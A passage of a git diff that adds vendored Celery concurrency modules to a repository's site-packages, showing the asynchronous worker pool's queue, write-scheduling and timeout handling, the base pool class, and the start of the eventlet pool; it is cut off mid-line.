pending_remove_fd.add, fileno_to_outq, on_state_change + ) + try: + join_exited_workers(shutdown=True) + except WorkersJoined: + debug('result handler: all workers terminated') + return + outqueues.difference_update(pending_remove_fd) + + def _flush_outqueue(self, fd, remove, process_index, on_state_change): + try: + proc = process_index[fd] + except KeyError: + # process already found terminated + # this means its outqueue has already been processed + # by the worker lost handler. + return remove(fd) + + reader = proc.outq._reader + try: + setblocking(reader, 1) + except OSError: + return remove(fd) + try: + if reader.poll(0): + task = reader.recv() + else: + task = None + sleep(0.5) + except (OSError, EOFError): + return remove(fd) + else: + if task: + on_state_change(task) + finally: + try: + setblocking(reader, 0) + except OSError: + return remove(fd) + + +class AsynPool(_pool.Pool): + """AsyncIO Pool (no threads).""" + + ResultHandler = ResultHandler + Worker = Worker + + #: Set by :meth:`register_with_event_loop` after running the first time. + _registered_with_event_loop = False + + def WorkerProcess(self, worker): + worker = super().WorkerProcess(worker) + worker.dead = False + return worker + + def __init__(self, processes=None, synack=False, + sched_strategy=None, proc_alive_timeout=None, + *args, **kwargs): + self.sched_strategy = SCHED_STRATEGIES.get(sched_strategy, + sched_strategy) + processes = self.cpu_count() if processes is None else processes + self.synack = synack + # create queue-pairs for all our processes in advance. + self._queues = { + self.create_process_queues(): None for _ in range(processes) + } + + # inqueue fileno -> process mapping + self._fileno_to_inq = {} + # outqueue fileno -> process mapping + self._fileno_to_outq = {} + # synqueue fileno -> process mapping + self._fileno_to_synq = {} + + # We keep track of processes that haven't yet + # sent a WORKER_UP message. If a process fails to send + # this message within _proc_alive_timeout we terminate it + # and hope the next process will recover. + self._proc_alive_timeout = ( + PROC_ALIVE_TIMEOUT if proc_alive_timeout is None + else proc_alive_timeout + ) + self._waiting_to_start = set() + + # denormalized set of all inqueues. + self._all_inqueues = set() + + # Set of fds being written to (busy) + self._active_writes = set() + + # Set of active co-routines currently writing jobs. + self._active_writers = set() + + # Set of fds that are busy (executing task) + self._busy_workers = set() + self._mark_worker_as_available = self._busy_workers.discard + + # Holds jobs waiting to be written to child processes. + self.outbound_buffer = deque() + + self.write_stats = Counter() + + super().__init__(processes, *args, **kwargs) + + for proc in self._pool: + # create initial mappings, these will be updated + # as processes are recycled, or found lost elsewhere. + self._fileno_to_outq[proc.outqR_fd] = proc + self._fileno_to_synq[proc.synqW_fd] = proc + + self.on_soft_timeout = getattr( + self._timeout_handler, 'on_soft_timeout', noop, + ) + self.on_hard_timeout = getattr( + self._timeout_handler, 'on_hard_timeout', noop, + ) + + def _create_worker_process(self, i): + worker_before_create_process.send(sender=self) + gc.collect() # Issue #2927 + return super()._create_worker_process(i) + + def _event_process_exit(self, hub, proc): + # This method is called whenever the process sentinel is readable. + self._untrack_child_process(proc, hub) + self.maintain_pool() + + def _track_child_process(self, proc, hub): + """Helper method determines appropriate fd for process.""" + try: + fd = proc._sentinel_poll + except AttributeError: + # we need to duplicate the fd here to carefully + # control when the fd is removed from the process table, + # as once the original fd is closed we cannot unregister + # the fd from epoll(7) anymore, causing a 100% CPU poll loop. + fd = proc._sentinel_poll = os.dup(proc._popen.sentinel) + # Safely call hub.add_reader for the determined fd + iterate_file_descriptors_safely( + [fd], None, hub.add_reader, + self._event_process_exit, hub, proc) + + def _untrack_child_process(self, proc, hub): + if proc._sentinel_poll is not None: + fd, proc._sentinel_poll = proc._sentinel_poll, None + hub.remove(fd) + os.close(fd) + + def register_with_event_loop(self, hub): + """Register the async pool with the current event loop.""" + self._result_handler.register_with_event_loop(hub) + self.handle_result_event = self._result_handler.handle_event + self._create_timelimit_handlers(hub) + self._create_process_handlers(hub) + self._create_write_handlers(hub) + + # Add handler for when a process exits (calls maintain_pool) + [self._track_child_process(w, hub) for w in self._pool] + # Handle_result_event is called whenever one of the + # result queues are readable. + iterate_file_descriptors_safely( + self._fileno_to_outq, self._fileno_to_outq, hub.add_reader, + self.handle_result_event, '*fd*') + + # Timers include calling maintain_pool at a regular interval + # to be certain processes are restarted. + for handler, interval in self.timers.items(): + hub.call_repeatedly(interval, handler) + + # Add on_poll_start to the event loop only once to prevent duplication + # when the Consumer restarts due to a connection error. + if not self._registered_with_event_loop: + hub.on_tick.add(self.on_poll_start) + self._registered_with_event_loop = True + + def _create_timelimit_handlers(self, hub): + """Create handlers used to implement time limits.""" + call_later = hub.call_later + trefs = self._tref_for_id = WeakValueDictionary() + + def on_timeout_set(R, soft, hard): + if soft: + trefs[R._job] = call_later( + soft, self._on_soft_timeout, R._job, soft, hard, hub, + ) + elif hard: + trefs[R._job] = call_later( + hard, self._on_hard_timeout, R._job, + ) + self.on_timeout_set = on_timeout_set + + def _discard_tref(job): + try: + tref = trefs.pop(job) + tref.cancel() + del tref + except (KeyError, AttributeError): + pass # out of scope + self._discard_tref = _discard_tref + + def on_timeout_cancel(R): + _discard_tref(R._job) + self.on_timeout_cancel = on_timeout_cancel + + def _on_soft_timeout(self, job, soft, hard, hub): + # only used by async pool. + if hard: + self._tref_for_id[job] = hub.call_later( + hard - soft, self._on_hard_timeout, job, + ) + try: + result = self._cache[job] + except KeyError: + pass # job ready + else: + self.on_soft_timeout(result) + finally: + if not hard: + # remove tref + self._discard_tref(job) + + def _on_hard_timeout(self, job): + # only used by async pool. + try: + result = self._cache[job] + except KeyError: + pass # job ready + else: + self.on_hard_timeout(result) + finally: + # remove tref + self._discard_tref(job) + + def on_job_ready(self, job, i, obj, inqW_fd): + self._mark_worker_as_available(inqW_fd) + + def _create_process_handlers(self, hub): + """Create handlers called on process up/down, etc.""" + add_reader, remove_reader, remove_writer = ( + hub.add_reader, hub.remove_reader, hub.remove_writer, + ) + cache = self._cache + all_inqueues = self._all_inqueues + fileno_to_inq = self._fileno_to_inq + fileno_to_outq = self._fileno_to_outq + fileno_to_synq = self._fileno_to_synq + busy_workers = self._busy_workers + handle_result_event = self.handle_result_event + process_flush_queues = self.process_flush_queues + waiting_to_start = self._waiting_to_start + + def verify_process_alive(proc): + proc = proc() # is a weakref + if (proc is not None and proc._is_alive() and + proc in waiting_to_start): + assert proc.outqR_fd in fileno_to_outq + assert fileno_to_outq[proc.outqR_fd] is proc + assert proc.outqR_fd in hub.readers + error('Timed out waiting for UP message from %r', proc) + os.kill(proc.pid, 9) + + def on_process_up(proc): + """Called when a process has started.""" + # If we got the same fd as a previous process then we'll also + # receive jobs in the old buffer, so we need to reset the + # job._write_to and job._scheduled_for attributes used to recover + # message boundaries when processes exit. + infd = proc.inqW_fd + for job in cache.values(): + if job._write_to and job._write_to.inqW_fd == infd: + job._write_to = proc + if job._scheduled_for and job._scheduled_for.inqW_fd == infd: + job._scheduled_for = proc + fileno_to_outq[proc.outqR_fd] = proc + + # maintain_pool is called whenever a process exits. + self._track_child_process(proc, hub) + + assert not isblocking(proc.outq._reader) + + # handle_result_event is called when the processes outqueue is + # readable. + add_reader(proc.outqR_fd, handle_result_event, proc.outqR_fd) + + waiting_to_start.add(proc) + hub.call_later( + self._proc_alive_timeout, verify_process_alive, ref(proc), + ) + + self.on_process_up = on_process_up + + def _remove_from_index(obj, proc, index, remove_fun, callback=None): + # this remove the file descriptors for a process from + # the indices. we have to make sure we don't overwrite + # another processes fds, as the fds may be reused. + try: + fd = obj.fileno() + except OSError: + return + + try: + if index[fd] is proc: + # fd hasn't been reused so we can remove it from index. + index.pop(fd, None) + except KeyError: + pass + else: + remove_fun(fd) + if callback is not None: + callback(fd) + return fd + + def on_process_down(proc): + """Called when a worker process exits.""" + if getattr(proc, 'dead', None): + return + process_flush_queues(proc) + _remove_from_index( + proc.outq._reader, proc, fileno_to_outq, remove_reader, + ) + if proc.synq: + _remove_from_index( + proc.synq._writer, proc, fileno_to_synq, remove_writer, + ) + inq = _remove_from_index( + proc.inq._writer, proc, fileno_to_inq, remove_writer, + callback=all_inqueues.discard, + ) + if inq: + busy_workers.discard(inq) + self._untrack_child_process(proc, hub) + waiting_to_start.discard(proc) + self._active_writes.discard(proc.inqW_fd) + remove_writer(proc.inq._writer) + remove_reader(proc.outq._reader) + if proc.synqR_fd: + remove_reader(proc.synq._reader) + if proc.synqW_fd: + self._active_writes.discard(proc.synqW_fd) + remove_reader(proc.synq._writer) + self.on_process_down = on_process_down + + def _create_write_handlers(self, hub, + pack=pack, dumps=_pickle.dumps, + protocol=HIGHEST_PROTOCOL): + """Create handlers used to write data to child processes.""" + fileno_to_inq = self._fileno_to_inq + fileno_to_synq = self._fileno_to_synq + outbound = self.outbound_buffer + pop_message = outbound.popleft + put_message = outbound.append + all_inqueues = self._all_inqueues + active_writes = self._active_writes + active_writers = self._active_writers + busy_workers = self._busy_workers + diff = all_inqueues.difference + add_writer = hub.add_writer + hub_add, hub_remove = hub.add, hub.remove + mark_write_fd_as_active = active_writes.add + mark_write_gen_as_active = active_writers.add + mark_worker_as_busy = busy_workers.add + write_generator_done = active_writers.discard + get_job = self._cache.__getitem__ + write_stats = self.write_stats + is_fair_strategy = self.sched_strategy == SCHED_STRATEGY_FAIR + revoked_tasks = worker_state.revoked + getpid = os.getpid + + precalc = {ACK: self._create_payload(ACK, (0,)), + NACK: self._create_payload(NACK, (0,))} + + def _put_back(job, _time=time.time): + # puts back at the end of the queue + if job._terminated is not None or \ + job.correlation_id in revoked_tasks: + if not job._accepted: + job._ack(None, _time(), getpid(), None) + job._set_terminated(job._terminated) + else: + # XXX linear lookup, should find a better way, + # but this happens rarely and is here to protect against races. + if job not in outbound: + outbound.appendleft(job) + self._put_back = _put_back + + # called for every event loop iteration, and if there + # are messages pending this will schedule writing one message + # by registering the 'schedule_writes' function for all currently + # inactive inqueues (not already being written to) + + # consolidate means the event loop will merge them + # and call the callback once with the list writable fds as + # argument. Using this means we minimize the risk of having + # the same fd receive every task if the pipe read buffer is not + # full. + + def on_poll_start(): + # Determine which io descriptors are not busy + inactive = diff(active_writes) + + # Determine hub_add vs hub_remove strategy conditional + if is_fair_strategy: + # outbound buffer present and idle workers exist + add_cond = outbound and len(busy_workers) < len(all_inqueues) + else: # default is add when data exists in outbound buffer + add_cond = outbound + + if add_cond: # calling hub_add vs hub_remove + iterate_file_descriptors_safely( + inactive, all_inqueues, hub_add, + None, WRITE | ERR, consolidate=True) + else: + iterate_file_descriptors_safely( + inactive, all_inqueues, hub_remove) + self.on_poll_start = on_poll_start + + def on_inqueue_close(fd, proc): + # Makes sure the fd is removed from tracking when + # the connection is closed, this is essential as fds may be reused. + busy_workers.discard(fd) + try: + if fileno_to_inq[fd] is proc: + fileno_to_inq.pop(fd, None) + active_writes.discard(fd) + all_inqueues.discard(fd) + except KeyError: + pass + self.on_inqueue_close = on_inqueue_close + self.hub_remove = hub_remove + + def schedule_writes(ready_fds, total_write_count=None): + if not total_write_count: + total_write_count = [0] + # Schedule write operation to ready file descriptor. + # The file descriptor is writable, but that does not + # mean the process is currently reading from the socket. + # The socket is buffered so writable simply means that + # the buffer can accept at least 1 byte of data. + + # This means we have to cycle between the ready fds. + # the first version used shuffle, but this version + # using `total_writes % ready_fds` is about 30% faster + # with many processes, and also leans more towards fairness + # in write stats when used with many processes + # [XXX On macOS, this may vary depending + # on event loop implementation (i.e, select/poll vs epoll), so + # have to test further] + num_ready = len(ready_fds) + + for _ in range(num_ready): + ready_fd = ready_fds[total_write_count[0] % num_ready] + total_write_count[0] += 1 + if ready_fd in active_writes: + # already writing to this fd + continue + if is_fair_strategy and ready_fd in busy_workers: + # worker is already busy with another task + continue + if ready_fd not in all_inqueues: + hub_remove(ready_fd) + continue + try: + job = pop_message() + except IndexError: + # no more messages, remove all inactive fds from the hub. + # this is important since the fds are always writable + # as long as there's 1 byte left in the buffer, and so + # this may create a spinloop where the event loop + # always wakes up. + for inqfd in diff(active_writes): + hub_remove(inqfd) + break + + else: + if not job._accepted: # job not accepted by another worker + try: + # keep track of what process the write operation + # was scheduled for. + proc = job._scheduled_for = fileno_to_inq[ready_fd] + except KeyError: + # write was scheduled for this fd but the process + # has since exited and the message must be sent to + # another process. + put_message(job) + continue + cor = _write_job(proc, ready_fd, job) + job._writer = ref(cor) + mark_write_gen_as_active(cor) + mark_write_fd_as_active(ready_fd) + mark_worker_as_busy(ready_fd) + + # Try to write immediately, in case there's an error. + try: + next(cor) + except StopIteration: + pass + except OSError as exc: + if exc.errno != errno.EBADF: + raise + else: + add_writer(ready_fd, cor) + hub.consolidate_callback = schedule_writes + + def send_job(tup): + # Schedule writing job request for when one of the process + # inqueues are writable. + body = dumps(tup, protocol=protocol) + body_size = len(body) + header = pack('>I', body_size) + # index 1,0 is the job ID. + job = get_job(tup[1][0]) + job._payload = memoryview(header), memoryview(body), body_size + put_message(job) + self._quick_put = send_job + + def on_not_recovering(proc, fd, job, exc): + logger.exception( + 'Process inqueue damaged: %r %r: %r', proc, proc.exitcode, exc) + if proc._is_alive(): + proc.terminate() + hub.remove(fd) + self._put_back(job) + + def _write_job(proc, fd, job): + # writes job to the worker process. + # Operation must complete if more than one byte of data + # was written. If the broker connection is lost + # and no data was written the operation shall be canceled. + header, body, body_size = job._payload + errors = 0 + try: + # job result keeps track of what process the job is sent to. + job._write_to = proc + send = proc.send_job_offset + + Hw = Bw = 0 + # write header + while Hw < 4: + try: + Hw += send(header, Hw) + except Exception as exc: # pylint: disable=broad-except + if getattr(exc, 'errno', None) not in UNAVAIL: + raise + # suspend until more data + errors += 1 + if errors > 100: + on_not_recovering(proc, fd, job, exc) + raise StopIteration() + yield + else: + errors = 0 + + # write body + while Bw < body_size: + try: + Bw += send(body, Bw) + except Exception as exc: # pylint: disable=broad-except + if getattr(exc, 'errno', None) not in UNAVAIL: + raise + # suspend until more data + errors += 1 + if errors > 100: + on_not_recovering(proc, fd, job, exc) + raise StopIteration() + yield + else: + errors = 0 + finally: + hub_remove(fd) + write_stats[proc.index] += 1 + # message written, so this fd is now available + active_writes.discard(fd) + write_generator_done(job._writer()) # is a weakref + + def send_ack(response, pid, job, fd): + # Only used when synack is enabled. + # Schedule writing ack response for when the fd is writable. + msg = Ack(job, fd, precalc[response]) + callback = promise(write_generator_done) + cor = _write_ack(fd, msg, callback=callback) + mark_write_gen_as_active(cor) + mark_write_fd_as_active(fd) + callback.args = (cor,) + add_writer(fd, cor) + self.send_ack = send_ack + + def _write_ack(fd, ack, callback=None): + # writes ack back to the worker if synack enabled. + # this operation *MUST* complete, otherwise + # the worker process will hang waiting for the ack. + header, body, body_size = ack[2] + try: + try: + proc = fileno_to_synq[fd] + except KeyError: + # process died, we can safely discard the ack at this + # point. + raise StopIteration() + send = proc.send_syn_offset + + Hw = Bw = 0 + # write header + while Hw < 4: + try: + Hw += send(header, Hw) + except Exception as exc: # pylint: disable=broad-except + if getattr(exc, 'errno', None) not in UNAVAIL: + raise + yield + + # write body + while Bw < body_size: + try: + Bw += send(body, Bw) + except Exception as exc: # pylint: disable=broad-except + if getattr(exc, 'errno', None) not in UNAVAIL: + raise + # suspend until more data + yield + finally: + if callback: + callback() + # message written, so this fd is now available + active_writes.discard(fd) + + def flush(self): + if self._state == TERMINATE: + return + # cancel all tasks that haven't been accepted so that NACK is sent + # if synack is enabled. + if self.synack: + for job in self._cache.values(): + if not job._accepted: + job._cancel() + + # clear the outgoing buffer as the tasks will be redelivered by + # the broker anyway. + if self.outbound_buffer: + self.outbound_buffer.clear() + + self.maintain_pool() + + try: + # ...but we must continue writing the payloads we already started + # to keep message boundaries. + # The messages may be NACK'ed later if synack is enabled. + if self._state == RUN: + # flush outgoing buffers + intervals = fxrange(0.01, 0.1, 0.01, repeatlast=True) + + # TODO: Rewrite this as a dictionary comprehension once we drop support for Python 3.7 + # This dict comprehension requires the walrus operator which is only available in 3.8. + owned_by = {} + for job in self._cache.values(): + writer = _get_job_writer(job) + if writer is not None: + owned_by[writer] = job + + if not self._active_writers: + self._cache.clear() + else: + while self._active_writers: + writers = list(self._active_writers) + for gen in writers: + if (gen.__name__ == '_write_job' and + gen_not_started(gen)): + # hasn't started writing the job so can + # discard the task, but we must also remove + # it from the Pool._cache. + try: + job = owned_by[gen] + except KeyError: + pass + else: + # removes from Pool._cache + job.discard() + self._active_writers.discard(gen) + else: + try: + job = owned_by[gen] + except KeyError: + pass + else: + job_proc = job._write_to + if job_proc._is_alive(): + self._flush_writer(job_proc, gen) + + job.discard() + # workers may have exited in the meantime. + self.maintain_pool() + sleep(next(intervals)) # don't busyloop + finally: + self.outbound_buffer.clear() + self._active_writers.clear() + self._active_writes.clear() + self._busy_workers.clear() + + def _flush_writer(self, proc, writer): + fds = {proc.inq._writer} + try: + while fds: + if not proc._is_alive(): + break # process exited + readable, writable, again = _select( + writers=fds, err=fds, timeout=0.5, + ) + if not again and (writable or readable): + try: + next(writer) + except (StopIteration, OSError, EOFError): + break + finally: + self._active_writers.discard(writer) + + def get_process_queues(self): + """Get queues for a new process. + + Here we'll find an unused slot, as there should always + be one available when we start a new process. + """ + return next(q for q, owner in self._queues.items() + if owner is None) + + def on_grow(self, n): + """Grow the pool by ``n`` processes.""" + diff = max(self._processes - len(self._queues), 0) + if diff: + self._queues.update({ + self.create_process_queues(): None for _ in range(diff) + }) + + def on_shrink(self, n): + """Shrink the pool by ``n`` processes.""" + + def create_process_queues(self): + """Create new in, out, etc. queues, returned as a tuple.""" + # NOTE: Pipes must be set O_NONBLOCK at creation time (the original + # fd), otherwise it won't be possible to change the flags until + # there's an actual reader/writer on the other side. + inq = _SimpleQueue(wnonblock=True) + outq = _SimpleQueue(rnonblock=True) + synq = None + assert isblocking(inq._reader) + assert not isblocking(inq._writer) + assert not isblocking(outq._reader) + assert isblocking(outq._writer) + if self.synack: + synq = _SimpleQueue(wnonblock=True) + assert isblocking(synq._reader) + assert not isblocking(synq._writer) + return inq, outq, synq + + def on_process_alive(self, pid): + """Called when receiving the :const:`WORKER_UP` message. + + Marks the process as ready to receive work. + """ + try: + proc = next(w for w in self._pool if w.pid == pid) + except StopIteration: + return logger.warning('process with pid=%s already exited', pid) + assert proc.inqW_fd not in self._fileno_to_inq + assert proc.inqW_fd not in self._all_inqueues + self._waiting_to_start.discard(proc) + self._fileno_to_inq[proc.inqW_fd] = proc + self._fileno_to_synq[proc.synqW_fd] = proc + self._all_inqueues.add(proc.inqW_fd) + + def on_job_process_down(self, job, pid_gone): + """Called for each job when the process assigned to it exits.""" + if job._write_to and not job._write_to._is_alive(): + # job was partially written + self.on_partial_read(job, job._write_to) + elif job._scheduled_for and not job._scheduled_for._is_alive(): + # job was only scheduled to be written to this process, + # but no data was sent so put it back on the outbound_buffer. + self._put_back(job) + + def on_job_process_lost(self, job, pid, exitcode): + """Called when the process executing job' exits. + + This happens when the process job' + was assigned to exited by mysterious means (error exitcodes and + signals). + """ + self.mark_as_worker_lost(job, exitcode) + + def human_write_stats(self): + if self.write_stats is None: + return 'N/A' + vals = list(self.write_stats.values()) + total = sum(vals) + + def per(v, total): + return f'{(float(v) / total) if v else 0:.2f}' + + return { + 'total': total, + 'avg': per(total / len(self.write_stats) if total else 0, total), + 'all': ', '.join(per(v, total) for v in vals), + 'raw': ', '.join(map(str, vals)), + 'strategy': SCHED_STRATEGY_TO_NAME.get( + self.sched_strategy, self.sched_strategy, + ), + 'inqueues': { + 'total': len(self._all_inqueues), + 'active': len(self._active_writes), + } + } + + def _process_cleanup_queues(self, proc): + """Called to clean up queues after process exit.""" + if not proc.dead: + try: + self._queues[self._find_worker_queues(proc)] = None + except (KeyError, ValueError): + pass + + @staticmethod + def _stop_task_handler(task_handler): + """Called at shutdown to tell processes that we're shutting down.""" + for proc in task_handler.pool: + try: + setblocking(proc.inq._writer, 1) + except OSError: + pass + else: + try: + proc.inq.put(None) + except OSError as exc: + if exc.errno != errno.EBADF: + raise + + def create_result_handler(self): + return super().create_result_handler( + fileno_to_outq=self._fileno_to_outq, + on_process_alive=self.on_process_alive, + ) + + def _process_register_queues(self, proc, queues): + """Mark new ownership for ``queues`` to update fileno indices.""" + assert queues in self._queues + b = len(self._queues) + self._queues[queues] = proc + assert b == len(self._queues) + + def _find_worker_queues(self, proc): + """Find the queues owned by ``proc``.""" + try: + return next(q for q, owner in self._queues.items() + if owner == proc) + except StopIteration: + raise ValueError(proc) + + def _setup_queues(self): + # this is only used by the original pool that used a shared + # queue for all processes. + self._quick_put = None + + # these attributes are unused by this class, but we'll still + # have to initialize them for compatibility. + self._inqueue = self._outqueue = \ + self._quick_get = self._poll_result = None + + def process_flush_queues(self, proc): + """Flush all queues. + + Including the outbound buffer, so that + all tasks that haven't been started will be discarded. + + In Celery this is called whenever the transport connection is lost + (consumer restart), and when a process is terminated. + """ + resq = proc.outq._reader + on_state_change = self._result_handler.on_state_change + fds = {resq} + while fds and not resq.closed and self._state != TERMINATE: + readable, _, _ = _select(fds, None, fds, timeout=0.01) + if readable: + try: + task = resq.recv() + except (OSError, EOFError) as exc: + _errno = getattr(exc, 'errno', None) + if _errno == errno.EINTR: + continue + elif _errno == errno.EAGAIN: + break + elif _errno not in UNAVAIL: + debug('got %r while flushing process %r', + exc, proc, exc_info=1) + break + else: + if task is None: + debug('got sentinel while flushing process %r', proc) + break + else: + on_state_change(task) + else: + break + + def on_partial_read(self, job, proc): + """Called when a job was partially written to exited child.""" + # worker terminated by signal: + # we cannot reuse the sockets again, because we don't know if + # the process wrote/read anything from them, and if so we cannot + # restore the message boundaries. + if not job._accepted: + # job was not acked, so find another worker to send it to. + self._put_back(job) + writer = _get_job_writer(job) + if writer: + self._active_writers.discard(writer) + del writer + + if not proc.dead: + proc.dead = True + # Replace queues to avoid reuse + before = len(self._queues) + try: + queues = self._find_worker_queues(proc) + if self.destroy_queues(queues, proc): + self._queues[self.create_process_queues()] = None + except ValueError: + pass + assert len(self._queues) == before + + def destroy_queues(self, queues, proc): + """Destroy queues that can no longer be used. + + This way they can be replaced by new usable sockets. + """ + assert not proc._is_alive() + self._waiting_to_start.discard(proc) + removed = 1 + try: + self._queues.pop(queues) + except KeyError: + removed = 0 + try: + self.on_inqueue_close(queues[0]._writer.fileno(), proc) + except OSError: + pass + for queue in queues: + if queue: + for sock in (queue._reader, queue._writer): + if not sock.closed: + self.hub_remove(sock) + try: + sock.close() + except OSError: + pass + return removed + + def _create_payload(self, type_, args, + dumps=_pickle.dumps, pack=pack, + protocol=HIGHEST_PROTOCOL): + body = dumps((type_, args), protocol=protocol) + size = len(body) + header = pack('>I', size) + return header, body, size + + @classmethod + def _set_result_sentinel(cls, _outqueue, _pool): + # unused + pass + + def _help_stuff_finish_args(self): + # Pool._help_stuff_finished is a classmethod so we have to use this + # trick to modify the arguments passed to it. + return (self._pool,) + + @classmethod + def _help_stuff_finish(cls, pool): + # pylint: disable=arguments-differ + debug( + 'removing tasks from inqueue until task handler finished', + ) + fileno_to_proc = {} + inqR = set() + for w in pool: + try: + fd = w.inq._reader.fileno() + inqR.add(fd) + fileno_to_proc[fd] = w + except OSError: + pass + while inqR: + readable, _, again = _select(inqR, timeout=0.5) + if again: + continue + if not readable: + break + for fd in readable: + fileno_to_proc[fd].inq._reader.recv() + sleep(0) + + @property + def timers(self): + return {self.maintain_pool: 5.0} diff --git a/env/Lib/site-packages/celery/concurrency/base.py b/env/Lib/site-packages/celery/concurrency/base.py new file mode 100644 index 00000000..1ce9a751 --- /dev/null +++ b/env/Lib/site-packages/celery/concurrency/base.py @@ -0,0 +1,180 @@ +"""Base Execution Pool.""" +import logging +import os +import sys +import time +from typing import Any, Dict + +from billiard.einfo import ExceptionInfo +from billiard.exceptions import WorkerLostError +from kombu.utils.encoding import safe_repr + +from celery.exceptions import WorkerShutdown, WorkerTerminate, reraise +from celery.utils import timer2 +from celery.utils.log import get_logger +from celery.utils.text import truncate + +__all__ = ('BasePool', 'apply_target') + +logger = get_logger('celery.pool') + + +def apply_target(target, args=(), kwargs=None, callback=None, + accept_callback=None, pid=None, getpid=os.getpid, + propagate=(), monotonic=time.monotonic, **_): + """Apply function within pool context.""" + kwargs = {} if not kwargs else kwargs + if accept_callback: + accept_callback(pid or getpid(), monotonic()) + try: + ret = target(*args, **kwargs) + except propagate: + raise + except Exception: + raise + except (WorkerShutdown, WorkerTerminate): + raise + except BaseException as exc: + try: + reraise(WorkerLostError, WorkerLostError(repr(exc)), + sys.exc_info()[2]) + except WorkerLostError: + callback(ExceptionInfo()) + else: + callback(ret) + + +class BasePool: + """Task pool.""" + + RUN = 0x1 + CLOSE = 0x2 + TERMINATE = 0x3 + + Timer = timer2.Timer + + #: set to true if the pool can be shutdown from within + #: a signal handler. + signal_safe = True + + #: set to true if pool uses greenlets. + is_green = False + + _state = None + _pool = None + _does_debug = True + + #: only used by multiprocessing pool + uses_semaphore = False + + task_join_will_block = True + body_can_be_buffer = False + + def __init__(self, limit=None, putlocks=True, forking_enable=True, + callbacks_propagate=(), app=None, **options): + self.limit = limit + self.putlocks = putlocks + self.options = options + self.forking_enable = forking_enable + self.callbacks_propagate = callbacks_propagate + self.app = app + + def on_start(self): + pass + + def did_start_ok(self): + return True + + def flush(self): + pass + + def on_stop(self): + pass + + def register_with_event_loop(self, loop): + pass + + def on_apply(self, *args, **kwargs): + pass + + def on_terminate(self): + pass + + def on_soft_timeout(self, job): + pass + + def on_hard_timeout(self, job): + pass + + def maintain_pool(self, *args, **kwargs): + pass + + def terminate_job(self, pid, signal=None): + raise NotImplementedError( + f'{type(self)} does not implement kill_job') + + def restart(self): + raise NotImplementedError( + f'{type(self)} does not implement restart') + + def stop(self): + self.on_stop() + self._state = self.TERMINATE + + def terminate(self): + self._state = self.TERMINATE + self.on_terminate() + + def start(self): + self._does_debug = logger.isEnabledFor(logging.DEBUG) + self.on_start() + self._state = self.RUN + + def close(self): + self._state = self.CLOSE + self.on_close() + + def on_close(self): + pass + + def apply_async(self, target, args=None, kwargs=None, **options): + """Equivalent of the :func:`apply` built-in function. + + Callbacks should optimally return as soon as possible since + otherwise the thread which handles the result will get blocked. + """ + kwargs = {} if not kwargs else kwargs + args = [] if not args else args + if self._does_debug: + logger.debug('TaskPool: Apply %s (args:%s kwargs:%s)', + target, truncate(safe_repr(args), 1024), + truncate(safe_repr(kwargs), 1024)) + + return self.on_apply(target, args, kwargs, + waitforslot=self.putlocks, + callbacks_propagate=self.callbacks_propagate, + **options) + + def _get_info(self) -> Dict[str, Any]: + """ + Return configuration and statistics information. Subclasses should + augment the data as required. + + :return: The returned value must be JSON-friendly. + """ + return { + 'implementation': self.__class__.__module__ + ':' + self.__class__.__name__, + 'max-concurrency': self.limit, + } + + @property + def info(self): + return self._get_info() + + @property + def active(self): + return self._state == self.RUN + + @property + def num_processes(self): + return self.limit diff --git a/env/Lib/site-packages/celery/concurrency/eventlet.py b/env/Lib/site-packages/celery/concurrency/eventlet.py new file mode 100644 index 00000000..f9c9da7f --- /dev/null +++ b/env/Lib/site-packages/celery/concurrency/eventlet.py @@ -0,0 +1,181 @@ +"""Eventlet execution pool.""" +import sys +from time import monotonic + +from greenlet import GreenletExit +from kombu.asynchronous import timer as _timer + +from celery import signals + +from . import base + +__all__ = ('TaskPool',) + +W_RACE = """\ +Celery module with %s imported before eventlet patched\ +""" +RACE_MODS = ('billiard.', 'celery.', 'kombu.') + + +#: Warn if we couldn't patch early enough, +#: and thread/socket depending celery modules have already been loaded. +for mod in (mod for mod in sys.modules if mod.startswith(RACE_MODS)): + for side in ('thread', 'threading', 'socket'): # pragma: no cover + if getattr(mod, side, None): + import warnings + warnings.warn(RuntimeWarning(W_RACE % side)) + + +def apply_target(target, args=(), kwargs=None, callback=None, + accept_callback=None, getpid=None): + kwargs = {} if not kwargs else kwargs + return base.apply_target(target, args, kwargs, callback, accept_callback, + pid=getpid()) + + +class Timer(_timer.Timer): + """Eventlet Timer.""" + + def __init__(self, *args, **kwargs): + from eventlet.greenthread import spawn_after + from greenlet import GreenletExit + super().__init__(*args, **kwargs) + + self.GreenletExit = GreenletExit + self._spawn_after = spawn_after + self._queue = set() + + def _enter(self, eta, priority, entry, **kwargs): + secs = max(eta - monotonic(), 0) + g = self._spawn_after(secs, entry) + self._queue.add(g) + g.link(self._entry_exit, entry) + g.entry = entry + g.eta = eta + g.priority = priority + g.canceled = False + return g + + def _entry_exit(self, g, entry): + try: + try: + g.wait() + except self.GreenletExit: + entry.cancel() + g.canceled = True + finally: + self._queue.discard(g) + + def clear(self): + queue = self._queue + while queue: + try: + queue.pop().cancel() + except (KeyError, self.GreenletExit): + pass + + def cancel(self, tref): + try: + tref.cancel() + except self.GreenletExit: + pass + + @property + def queue(self): + return self._queue + + +class TaskPool(base.BasePool): + """Eventlet Task Pool.""" + + Timer = Timer + + signal_safe = False + is_green = True + task_join_will_block = False + _pool = None + _pool_map = None + _quick_put = None + + def __init__(self, *args, **kwargs): + from eventlet import greenthread + from eventlet.greenpool import GreenPool + self.Pool = GreenPool + self.getcurrent = greenthread.getcurrent + self.getpid = lambda: id(greenthread.getcurrent()) + self.spawn_n = greenthread.spawn_n + + super().__init__(*args, **kwargs) + + def on_start(self): + self._pool = self.Pool(self.limit) + self._pool_map = {} + signals.eventlet_pool_started.send(sender=self) + self._quick_put = self._pool.spawn + self._quick_apply_sig = signals.eventlet_pool_apply.send + + def on_stop(self): + signals.eventlet_pool_preshutdown.send(sender=self) + if self._pool is not None: + self._pool.waitall() + signals.eventlet_pool_postshutdown.send(sender=self) + + def on_apply(self, target, args=None, kwargs=None, callback=None, + accept_callback=None, **_): + target = TaskPool._make_killable_target(target) + self._quick_apply_sig(sender=self, target=target, args=args, kwargs=kwargs,) + greenlet = self._quick_put( + apply_target, + target, args, + kwargs, + callback, + accept_callback, + self.getpid + ) + self._add_to_pool_map(id(greenlet), greenlet) + + def grow(self, n=1): + limit = self.limit + n + self._pool.resize(limit) + self.limit = limit + + def shrink(self, n=1): + limit = self.limit - n + self._pool.resize(limit) + self.limit = limit + + def terminate_job(self, pid, signal=None): + if pid in self._pool_map.keys(): + greenlet = 